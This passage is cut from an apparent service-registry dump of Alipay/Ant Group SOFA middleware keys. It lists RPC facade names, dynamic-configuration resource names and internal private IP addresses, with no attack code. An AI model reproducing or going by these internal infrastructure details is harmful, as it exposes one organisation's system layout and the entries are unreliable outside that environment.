ore.shared.drm.FlowConfigDrm.recoveryQuotaWhenRefundWhiteUids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ecsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.discount.drm.DstCampCommonDrm.userIdDstCampConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityTicketFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.insmobile.evaluateAppDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.129.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.TaskEventMappingServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.PdServiceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_ordered_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeha.sdk.biz.fund.basic.api.FundHaDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.AoneProjectBugService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sccounter.facade.UserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.116.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_SECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:csmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:uctPunishLog@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_campApproveFailCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.74.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.148.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.inspect.InspectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.180.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.fcbuservice.common.service.facade.DepartmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appstore.common.service.facade.commodity.MerchandiseQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.robot.RobotInsertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.ldc.demo.TestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acsubscriberprod.facade.service.EventCodeConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.xview.console.core.service.ValidateListComponent:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanyPositionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recadmin.core.service.cache.AirDoRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeval.common.service.facade.morpho.MorphoReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.oceanbase.obforumcore.service.miniapp.miniappfacade.MiniAppQuestionnaireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FinormExpressEngineDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inslifequality@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterSentenceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:exriskcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-gongtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.domain2Size,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.biz.infocenter.drm.RecoveryConfig.configText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.36.24.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:csoffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promobench.common.service.facade.service.TenantPermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.LocalCacheResource.command,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.suiteide.common.service.facade.api.SuiteVarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.SwitchCoreConsistQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antb_processCallback_antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.UserOriginResidenceService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fastq-easyapps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.cif.client.drm.PerformanceSwitcher.whiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.custdpc.scheduler.SchedulerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finriskmngcore.common.service.facade.api.FundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.QuotationIndicatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundcore.common.service.facade.FundUserServiceSubscriberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.switchVal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctransquery.common.service.facade.api.OrdinaryAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.216.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradeSpecialConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.apply.AssetApplyOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.isUseEquityCoupon,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:idpatrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngTicketImageVerifyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tdss-gov@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_JINRONGYUN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cashier.service.api.BizTypeConsultService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.taskmanager.OstsAbossStateCheckTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.user.BucServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.video.VideoCommentMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.aip.FundFixedUnionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.cost.service.test.MorderEventMockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.change.custom.CustomChgMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:infosectask_itaskExpanisionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.LiveServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revmng.common.service.facade.RevmngPriceAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.QualityTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesTransferOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FactorScopeStatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.fasttext.FastTextService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.skipRedeemDecideSubContractIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emembercenter.facade.OperatorPasswordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCCONTRACTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rating@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.prodWhiteStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:eventtrackvalidation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaViewAlarmManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkperf.common.service.facade.check.service.smartinterface.ExecuteRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MOA_INTERNAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.contentIgnoredFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotationcore.common.service.facade.api.indicator.IndicatorCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.api.TaskServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofaproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.publishModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.SelectUserUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.rpc.ReplyH5Rpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.tradequery.facade.ProxyFundBillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@amldataproc#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.fortuneLuckGoldNoFundVouhcerStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.prophet.HistoryPointRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.ms.service.SofaCircuitBreakerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.clive.common.service.facade.api.CompScreenShotQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.lisa.PcClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.api.FundAllocFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.location.ResLocationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.OverviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyfbi.core.service.messaging.AlertDelaySendListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizprodsys.common.service.facade.govbizprodsysconfig.OrgModelConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unirelease@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_169.254.84.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.facade.settle.AdjustManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.taxcenter.common.service.facade.api.InnerHandleTaxExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.imtmsvcprod.common.service.facade.enterprise.EnterpriseBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:exriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.StrategyActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personal.service.consume.facade.QueryBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.event.EventChartService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.QueryMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.177.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.cidChangeSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.queryResendProcessLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.145.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_CPCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_tradeCardInfoFacade_fundCollect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_NOTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.UcdpPositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.StatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.230.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.AssistantToolRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gffund.common.service.facade.api.ExchangeRateInquiryGeneralInteractionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetTransApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnTaskResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icsprod.common.service.facade.api.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.BizActionCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardDepositFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.skipDeferProcessCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.payment.common.api.AssetConsultService:1.0:instpayAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFA4CORELXY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.TaskRunningFacade:1.0:frscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ApInvoiceContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:merchant_info_setting_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iexratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:roleapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.spi.PayPlusDispatchService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebankcore.common.service.facade.service.OpenCoopAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebSystemParamRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskOperatorService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmservicehub.common.service.facade.zdatafront.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ChangeOrderTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminGrayChangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.dashboard.DashboardMapDataService:1.0:old@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.GreyMonitorConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.TestRunTaskService:1.0:uctfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.process.config.ProcessConfigManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:offlineRepayNewApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:aeicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.approvalEvent.ApprovalEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.TroubleShootingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","vehownerprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.astaralarm.common.service.facade.tvm.VulLogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.SettleBankManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.cloudinc.core.antvip.AntvipDrmControl.antvipPollingRoundSleepTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-omegakoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.MerchantOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.EnterpriseTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.migrationActionMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxconf.service.facade.ctrl.DataManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.core.service.qrcode.QrCodeScanMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antvip.serverlist.client#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chargefront:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.openapi.generic.api.GenericServiceSpi:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.investtrade.facade.api.option.SecurityOptionBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.asyncRunning,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.workflow.WorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.service.facade.RccenterPortalInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.common.service.facade.eventconfig.api.ExtensionEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpointprod.facade.api.MpointAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.elm.InsClaimReportApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.CampTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insdataprod.common.service.facade.survey.api.MultipleLoanDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.common.service.facade.reversepayment.ReversePaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.falcon.facade.api.SymbolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:salaryErrorInfoDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.SocialActivityCenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipa